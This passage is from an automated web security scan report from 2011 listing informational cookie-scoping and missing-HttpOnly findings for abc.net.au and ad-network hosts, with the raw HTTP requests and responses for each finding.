Date: Wed, 07 Sep 2011 14:14:12 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ABCGuestID=80.67.74.139.103791315404852896; expires=Wed, 07-Sep-2011 14:44:12 GMT; path=/; domain=abc.net.au

.river_of_content h2 {
   display: none;
}

.news #col1 p.description {
   margin: 10px;
   color: #666666;
}

.news .about .story {
   left:-30px;
   overflow:hidden;
   padding: 0 0 0 30px;
   positi
...[SNIP]...

8.68. http://www.abc.net.au/local/global_css/palettes/generic.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.abc.net.au
Path:	/local/global_css/palettes/generic.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ABCGuestID=80.67.74.139.103791315404852911; expires=Wed, 07-Sep-2011 14:44:12 GMT; path=/; domain=abc.net.au

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /local/global_css/palettes/generic.css HTTP/1.1
Host: www.abc.net.au
Proxy-Connection: keep-alive
Referer: http://www.abc.net.au/perth/news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 08 Sep 2010 02:39:31 GMT
ETag: "1259a3d-61a-6c525ec0"
Accept-Ranges: bytes
Content-Type: text/css
Vary: Accept-Encoding
Cache-Control: max-age=24848
Expires: Wed, 07 Sep 2011 21:08:20 GMT
Date: Wed, 07 Sep 2011 14:14:12 GMT
Content-Length: 1562
Connection: close
Set-Cookie: ABCGuestID=80.67.74.139.103791315404852911; expires=Wed, 07-Sep-2011 14:44:12 GMT; path=/; domain=abc.net.au

.gen_color1 {color: #1c3f5e;}
.gen_color2 {color: #2273b1;}
.gen_color3 {color: #dcf0ff;}
.gen_color4 {color: #4b483f;}
.gen_color5 {color: #746d61;}
.gen_color6 {color: #000000;}
.gen_color7 {c
...[SNIP]...

8.69. http://www.abc.net.au/local/global_css/palettes/paletteA.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.abc.net.au
Path:	/local/global_css/palettes/paletteA.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ABCGuestID=80.67.74.139.103791315404852861; expires=Wed, 07-Sep-2011 14:44:12 GMT; path=/; domain=abc.net.au

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /local/global_css/palettes/paletteA.css HTTP/1.1
Host: www.abc.net.au
Proxy-Connection: keep-alive
Referer: http://www.abc.net.au/perth/news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 04 May 2011 04:56:45 GMT
ETag: "1259a3f-518-15567d40"
Accept-Ranges: bytes
Content-Type: text/css
Vary: Accept-Encoding
Cache-Control: max-age=70010
Expires: Thu, 08 Sep 2011 09:41:02 GMT
Date: Wed, 07 Sep 2011 14:14:12 GMT
Content-Length: 1304
Connection: close
Set-Cookie: ABCGuestID=80.67.74.139.103791315404852861; expires=Wed, 07-Sep-2011 14:44:12 GMT; path=/; domain=abc.net.au

.paletteA .color1 {color: #434983;}
.paletteA .color2 {color: #4851aa;}
.paletteA .color3 {color: #704694;}
.paletteA .color4 {color: #c1aed1;}
.paletteA .color5 {color: #f5effa;}
.paletteA .colo
...[SNIP]...

8.70. http://www.abc.net.au/local/global_css/styles.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.abc.net.au
Path:	/local/global_css/styles.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ABCGuestID=80.67.74.139.103791315404852838; expires=Wed, 07-Sep-2011 14:44:12 GMT; path=/; domain=abc.net.au

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /local/global_css/styles.css HTTP/1.1
Host: www.abc.net.au
Proxy-Connection: keep-alive
Referer: http://www.abc.net.au/perth/news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Fri, 15 Jul 2011 08:22:41 GMT
ETag: "1956216-3b90-5a631640"
Accept-Ranges: bytes
Content-Type: text/css
Vary: Accept-Encoding
Cache-Control: max-age=24847
Expires: Wed, 07 Sep 2011 21:08:19 GMT
Date: Wed, 07 Sep 2011 14:14:12 GMT
Content-Length: 15248
Connection: close
Set-Cookie: ABCGuestID=80.67.74.139.103791315404852838; expires=Wed, 07-Sep-2011 14:44:12 GMT; path=/; domain=abc.net.au

#BigPictureMode img {
   float: right ;
   margin-bottom:5px;
   width:185px;
   padding: 5px 5px 5px 0;
}

a {
   text-decoration: none;
}

a:hover {
   text-decoration: underline;
}

ul {
   m
...[SNIP]...

8.71. http://www.abc.net.au/local/global_css/template/styles.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.abc.net.au
Path:	/local/global_css/template/styles.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ABCGuestID=80.67.74.139.103791315404852869; expires=Wed, 07-Sep-2011 14:44:12 GMT; path=/; domain=abc.net.au

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /local/global_css/template/styles.css HTTP/1.1
Host: www.abc.net.au
Proxy-Connection: keep-alive
Referer: http://www.abc.net.au/perth/news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Thu, 31 Mar 2011 03:37:17 GMT
ETag: "33bbf3-379-289d540"
Accept-Ranges: bytes
Content-Type: text/css
Content-Length: 889
Cache-Control: max-age=24847
Expires: Wed, 07 Sep 2011 21:08:19 GMT
Date: Wed, 07 Sep 2011 14:14:12 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ABCGuestID=80.67.74.139.103791315404852869; expires=Wed, 07-Sep-2011 14:44:12 GMT; path=/; domain=abc.net.au

body {font-size:80%;}

#access_keys {padding: 5px 0; position: absolute; left: -5000px; width: 100%; background: #FFFFFF}

#access_keys a {
margin: 0 10px;
}

/* Module styles */

.module
...[SNIP]...

8.72. http://www.abc.net.au/local/global_css/yaml/central_draft.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.abc.net.au
Path:	/local/global_css/yaml/central_draft.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ABCGuestID=80.67.74.139.103791315404852839; expires=Wed, 07-Sep-2011 14:44:12 GMT; path=/; domain=abc.net.au

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /local/global_css/yaml/central_draft.css HTTP/1.1
Host: www.abc.net.au
Proxy-Connection: keep-alive
Referer: http://www.abc.net.au/perth/news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 30 Mar 2011 05:24:55 GMT
ETag: "2fe47e-620-659fb7c0"
Accept-Ranges: bytes
Content-Type: text/css
Content-Length: 1568
Cache-Control: max-age=24847
Expires: Wed, 07 Sep 2011 21:08:19 GMT
Date: Wed, 07 Sep 2011 14:14:12 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ABCGuestID=80.67.74.139.103791315404852839; expires=Wed, 07-Sep-2011 14:44:12 GMT; path=/; domain=abc.net.au

@charset "UTF-8";
@import url(/local/global_css/yaml/core/slim_base.css);
html #page_margins div{float:left}
#page{width:1000px}
#banner{width:100%}
body{text-align:center; margin:0; padding:0;
...[SNIP]...

8.73. http://www.abc.net.au/local/global_css/yaml/core/slim_base.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.abc.net.au
Path:	/local/global_css/yaml/core/slim_base.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ABCGuestID=80.67.74.139.103791315404853497; expires=Wed, 07-Sep-2011 14:44:13 GMT; path=/; domain=abc.net.au

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /local/global_css/yaml/core/slim_base.css HTTP/1.1
Host: www.abc.net.au
Proxy-Connection: keep-alive
Referer: http://www.abc.net.au/perth/news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Tue, 02 Feb 2010 00:14:39 GMT
ETag: "2fe484-7b9-fcd539c0"
Accept-Ranges: bytes
Content-Type: text/css
Vary: Accept-Encoding
Cache-Control: max-age=24852
Expires: Wed, 07 Sep 2011 21:08:25 GMT
Date: Wed, 07 Sep 2011 14:14:13 GMT
Content-Length: 1977
Connection: close
Set-Cookie: ABCGuestID=80.67.74.139.103791315404853497; expires=Wed, 07-Sep-2011 14:44:13 GMT; path=/; domain=abc.net.au

@charset "UTF-8";
/* "Yet Another Multicolumn Layout" v3.0.6 (c) by Dirk Jesse (http://www.yaml.de)
* $Revision: 202 $ $Date: 2008-06-07 14:29:18 +0200 (Sa, 07 Jun 2008) $ */
@media all {
*{margin
...[SNIP]...

8.74. http://www.abc.net.au/local/global_scripts/contribute/functions.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.abc.net.au
Path:	/local/global_scripts/contribute/functions.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ABCGuestID=80.67.74.139.103791315404853252; expires=Wed, 07-Sep-2011 14:44:13 GMT; path=/; domain=abc.net.au

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /local/global_scripts/contribute/functions.js HTTP/1.1
Host: www.abc.net.au
Proxy-Connection: keep-alive
Referer: http://www.abc.net.au/perth/news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 27 Jul 2011 02:45:56 GMT
ETag: "f28660-740f-c2bc100"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Content-Length: 29711
Cache-Control: max-age=6707
Expires: Wed, 07 Sep 2011 16:06:00 GMT
Date: Wed, 07 Sep 2011 14:14:13 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ABCGuestID=80.67.74.139.103791315404853252; expires=Wed, 07-Sep-2011 14:44:13 GMT; path=/; domain=abc.net.au

var yourLogin;
yourLogin = {};
var yourGallery = [];

function getCookie(c_name)
{
if (document.cookie.length>0)
{
c_start=document.cookie.indexOf(c_name + "=");
if (c_start!=-1)
{
...[SNIP]...

8.75. http://www.abc.net.au/local/global_scripts/general.min.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.abc.net.au
Path:	/local/global_scripts/general.min.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ABCGuestID=80.67.74.139.103791315404853288; expires=Wed, 07-Sep-2011 14:44:13 GMT; path=/; domain=abc.net.au

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /local/global_scripts/general.min.js HTTP/1.1
Host: www.abc.net.au
Proxy-Connection: keep-alive
Referer: http://www.abc.net.au/perth/news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Mon, 16 May 2011 03:01:47 GMT
ETag: "371668-14d-e047dcc0"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Content-Length: 333
Cache-Control: max-age=57421
Expires: Thu, 08 Sep 2011 06:11:14 GMT
Date: Wed, 07 Sep 2011 14:14:13 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ABCGuestID=80.67.74.139.103791315404853288; expires=Wed, 07-Sep-2011 14:44:13 GMT; path=/; domain=abc.net.au

$(document).ready(function(){var clickstatus="open";$(".bc_icon").click(function(){$(".bc_wrap").toggle("slow");$(".bc_icon").toggleClass("active");if(clickstatus==="open"){$(".bc_icon").attr("title",
...[SNIP]...

8.76. http://www.abc.net.au/local/includes/scripts/city_include.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.abc.net.au
Path:	/local/includes/scripts/city_include.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ABCGuestID=80.67.74.139.103791315404853254; expires=Wed, 07-Sep-2011 14:44:13 GMT; path=/; domain=abc.net.au

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /local/includes/scripts/city_include.js HTTP/1.1
Host: www.abc.net.au
Proxy-Connection: keep-alive
Referer: http://www.abc.net.au/perth/news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Mon, 13 Dec 2010 06:04:30 GMT
ETag: "7570aa-1009-7a2a3780"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Content-Length: 4105
Cache-Control: max-age=57416
Expires: Thu, 08 Sep 2011 06:11:09 GMT
Date: Wed, 07 Sep 2011 14:14:13 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ABCGuestID=80.67.74.139.103791315404853254; expires=Wed, 07-Sep-2011 14:44:13 GMT; path=/; domain=abc.net.au

var LinksLimit = 4;
LinksLimit = parseInt(LinksLimit);

// Specify cookie name.
//var CookieName = "ABCRegion";
var CookieName = "ABCGuestID";

var DaysToLive = 0;
DaysToLive = parseInt(DaysTo
...[SNIP]...

8.77. http://www.abc.net.au/local/includes/scripts/jquery/plugins/jquery.tools.min.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.abc.net.au
Path:	/local/includes/scripts/jquery/plugins/jquery.tools.min.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ABCGuestID=80.67.74.139.103791315404853243; expires=Wed, 07-Sep-2011 14:44:13 GMT; path=/; domain=abc.net.au

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /local/includes/scripts/jquery/plugins/jquery.tools.min.js HTTP/1.1
Host: www.abc.net.au
Proxy-Connection: keep-alive
Referer: http://www.abc.net.au/perth/news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Sun, 21 Nov 2010 04:24:36 GMT
ETag: "197d20c-e56-8462c900"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: max-age=9635
Expires: Wed, 07 Sep 2011 16:54:48 GMT
Date: Wed, 07 Sep 2011 14:14:13 GMT
Content-Length: 3670
Connection: close
Set-Cookie: ABCGuestID=80.67.74.139.103791315404853243; expires=Wed, 07-Sep-2011 14:44:13 GMT; path=/; domain=abc.net.au

/*
* jquery.tools 1.0.2 - The missing UI library
*
* [tools.tabs-1.0.1]
*
* Copyright (c) 2009 Tero Piirainen
* http://flowplayer.org/tools/
*
* Dual licensed under MIT and GPL 2+ li
...[SNIP]...

8.78. http://www.abc.net.au/local/includes/scripts/tabs_latest_media.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.abc.net.au
Path:	/local/includes/scripts/tabs_latest_media.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ABCGuestID=80.67.74.139.103791315404853287; expires=Wed, 07-Sep-2011 14:44:13 GMT; path=/; domain=abc.net.au

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /local/includes/scripts/tabs_latest_media.js HTTP/1.1
Host: www.abc.net.au
Proxy-Connection: keep-alive
Referer: http://www.abc.net.au/perth/news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Tue, 22 Dec 2009 01:26:05 GMT
ETag: "197d1ff-88-16f6a540"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Content-Length: 136
Cache-Control: max-age=12700
Expires: Wed, 07 Sep 2011 17:45:53 GMT
Date: Wed, 07 Sep 2011 14:14:13 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ABCGuestID=80.67.74.139.103791315404853287; expires=Wed, 07-Sep-2011 14:44:13 GMT; path=/; domain=abc.net.au

$(function() {
// setup ul.tabs to work as tabs for each div directly under div.panes
$("ul.tabslm").tabs("div.paneslm > div");
});

8.79. http://www.abc.net.au/res/abc/styles/screen.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.abc.net.au
Path:	/res/abc/styles/screen.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ABCGuestID=80.67.74.139.103791315404852841; expires=Wed, 07-Sep-2011 14:44:12 GMT; path=/; domain=abc.net.au

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /res/abc/styles/screen.css HTTP/1.1
Host: www.abc.net.au
Proxy-Connection: keep-alive
Referer: http://www.abc.net.au/perth/news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Mon, 14 Mar 2011 01:34:07 GMT
ETag: "1231186-1618-4ec201c0"
Accept-Ranges: bytes
Content-Type: text/css
Content-Length: 5656
Cache-Control: max-age=54776
Expires: Thu, 08 Sep 2011 05:27:08 GMT
Date: Wed, 07 Sep 2011 14:14:12 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ABCGuestID=80.67.74.139.103791315404852841; expires=Wed, 07-Sep-2011 14:44:12 GMT; path=/; domain=abc.net.au

/* --- ABC Nav and Footer styles --- */
/* created by: Geoff Pack, Mar 2009 */
/* last modified: March 2011 */

/* --- ABC Nav --- */

#abcNav {margin:0; padding:0; min-width:10
...[SNIP]...

8.80. http://www.abc.net.au/res/libraries/abcjs/abc.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.abc.net.au
Path:	/res/libraries/abcjs/abc.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ABCGuestID=80.67.74.139.103791315404852837; expires=Wed, 07-Sep-2011 14:44:12 GMT; path=/; domain=abc.net.au

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /res/libraries/abcjs/abc.js HTTP/1.1
Host: www.abc.net.au
Proxy-Connection: keep-alive
Referer: http://www.abc.net.au/perth/news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 18 Aug 2010 00:51:49 GMT
ETag: "feb3f2-1533-787d3340"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: max-age=67469
Expires: Thu, 08 Sep 2011 08:58:41 GMT
Date: Wed, 07 Sep 2011 14:14:12 GMT
Content-Length: 5427
Connection: close
Set-Cookie: ABCGuestID=80.67.74.139.103791315404852837; expires=Wed, 07-Sep-2011 14:44:12 GMT; path=/; domain=abc.net.au

/**
* @namespace
* @description All general ABC methods and functionality should be placed
*                within this namespace.
* @version    0.0.1 March 2010
* @author        ABC Innovation
*
*/

var
...[SNIP]...

8.81. http://www.abc.net.au/res/libraries/jquery/jquery-latest.min.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.abc.net.au
Path:	/res/libraries/jquery/jquery-latest.min.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ABCGuestID=80.67.74.139.103791315404853242; expires=Wed, 07-Sep-2011 14:44:13 GMT; path=/; domain=abc.net.au

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /res/libraries/jquery/jquery-latest.min.js HTTP/1.1
Host: www.abc.net.au
Proxy-Connection: keep-alive
Referer: http://www.abc.net.au/perth/news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Tue, 31 May 2011 03:29:29 GMT
ETag: "1a5c576-164ce-2f69840"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Content-Length: 91342
Cache-Control: max-age=35387
Expires: Thu, 08 Sep 2011 00:04:00 GMT
Date: Wed, 07 Sep 2011 14:14:13 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ABCGuestID=80.67.74.139.103791315404853242; expires=Wed, 07-Sep-2011 14:44:13 GMT; path=/; domain=abc.net.au

/*!
* jQuery JavaScript Library v1.6.1
* http://jquery.com/
*
* Copyright 2011, John Resig
* Dual licensed under the MIT or GPL Version 2 licenses.
* http://jquery.org/license
*
* Includes Siz
...[SNIP]...

8.82. http://www.abc.net.au/res/libraries/pluck/abc.pluck-1.latest.min.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.abc.net.au
Path:	/res/libraries/pluck/abc.pluck-1.latest.min.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ABCGuestID=80.67.74.139.103791315404853269; expires=Wed, 07-Sep-2011 14:44:13 GMT; path=/; domain=abc.net.au

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

8.83. http://www.wtp101.com/pull_sync previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wtp101.com
Path:	/pull_sync

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

tuuid=f9bdca69-e609-4297-9145-48ea56a0756c; path=/; expires=Fri, 06 Sep 2013 14:14:28 GMT; domain=.wtp101.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pull_sync?pid=rubicon HTTP/1.1
Host: www.wtp101.com
Proxy-Connection: keep-alive
Referer: http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html?rtb_ext=1&pc=7856/12590
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tuuid=f9bdca69-e609-4297-9145-48ea56a0756c

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Wed, 07 Sep 2011 14:14:28 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Location: http://pixel.rubiconproject.com/tap.php?v=5328&nid=2025&put=f9bdca69-e609-4297-9145-48ea56a0756c&expires=730
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Pragma: no-cache
Set-Cookie: tuuid=f9bdca69-e609-4297-9145-48ea56a0756c; path=/; expires=Fri, 06 Sep 2013 14:14:28 GMT; domain=.wtp101.com
Content-Length: 0
Connection: keep-alive

9. Cookie without HttpOnly flag set previous next
There are 96 instances of this issue:

http://www.6pr.com.au/
http://a.triggit.com/pxrucm
http://ad.agkn.com/iframe!t=1131!
http://ad.yabuka.com/statsin/adframe/693/300x250
http://ad.yieldmanager.com/iframe3
http://ad.yieldmanager.com/iframe3
http://ad.yieldmanager.com/imp
http://ad.yieldmanager.com/imp
http://adsfac.us/ag.asp
http://api.twitter.com/1/statuses/user_timeline.json
http://au.news.yahoo.com/thewest/a/-/wa/10210782/wildcats-abandon-bogut-for-nevill/
http://au.news.yahoo.com/thewest/business/
http://b.scorecardresearch.com/b
http://bh.contextweb.com/bh/rtset
http://bid.rb.ntc.ace.advertising.com/site=0000799975/size=728090/u=2/bnum=54069056/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/tags=1/rubcpmprice=6F4E7BBBFD8CE677/istr=OTYwNDg0Ojc4OjA6MC4wMDA1ODQ2ODowLjAwMDU4NDY4OjAuMDAwNTg0Njg6MC4wMDA1NzMxODoxOjE6MC4wMDA1ODQ2ODowLjk3ODY0ODowLjAwMDUxMjg2NDY6MC4wMDA1ODkyODMzOjEzMTU0MDQwNjE6NTozOjEuMDIxMzUyOjAuMDAwNTEyODY0Ng/srcreq=8/bidtid=ASf536a25b934d4dbabaaf671365070601/guidm=1007:n4tx19dbice3prpg7887b1ymgzfc6iit/dref=http%253A%252F%252Fweather.news.com.au%252Fwa%252Fperth%252Fperth
http://bid.rb.ntc.ace.advertising.com/site=0000799975/size=728090/u=2/bnum=68910242/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=2/f=2/r=1/optn=1/fv=10/aolexp=0/tags=1/rubcpmprice=01F5D655E2FFC4EB/istr=OTYwNDg0Ojc4OjA6MC4wMDA1ODQ2ODowLjAwMDU4NDY4OjAuMDAwNTg0Njg6MC4wMDA1NzMxODoxOjE6MC4wMDA1ODQ2ODowLjk3ODY0ODowLjAwMDUxMjg2NDY6MC4wMDA1ODkyODMzOjEzMTU0MDQwNjE6NTozOjEuMDIxMzUyOjAuMDAwNTEyODY0Ng/srcreq=8/bidtid=AS072e9051ae61480d8af8a5a920c43596/guidm=1007:n4tx19dbice3prpg7887b1ymgzfc6iit/dref=http%253A%252F%252Fweather.news.com.au%252Fwa%252Fperth%252Fperth
http://bid.rb.ntc.ace.advertising.com/site=0000799975/size=728090/u=2/bnum=70524729/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=3/f=2/r=1/optn=1/fv=10/aolexp=0/tags=1/rubcpmprice=01F5D655E2FFC4EB/istr=OTYwNDg0Ojc4OjA6MC4wMDA1ODQ2ODowLjAwMDU4NDY4OjAuMDAwNTg0Njg6MC4wMDA1NzMxODoxOjE6MC4wMDA1ODQ2ODowLjk3ODY0ODowLjAwMDUxMjg2NDY6MC4wMDA1ODkyODMzOjEzMTU0MDQwNjE6NTozOjEuMDIxMzUyOjAuMDAwNTEyODY0Ng/srcreq=8/bidtid=AS2463e9943a804387a72e0e9f481b7178/guidm=1007:n4tx19dbice3prpg7887b1ymgzfc6iit/dref=http%253A%252F%252Fwww.perthnow.com.au%252F
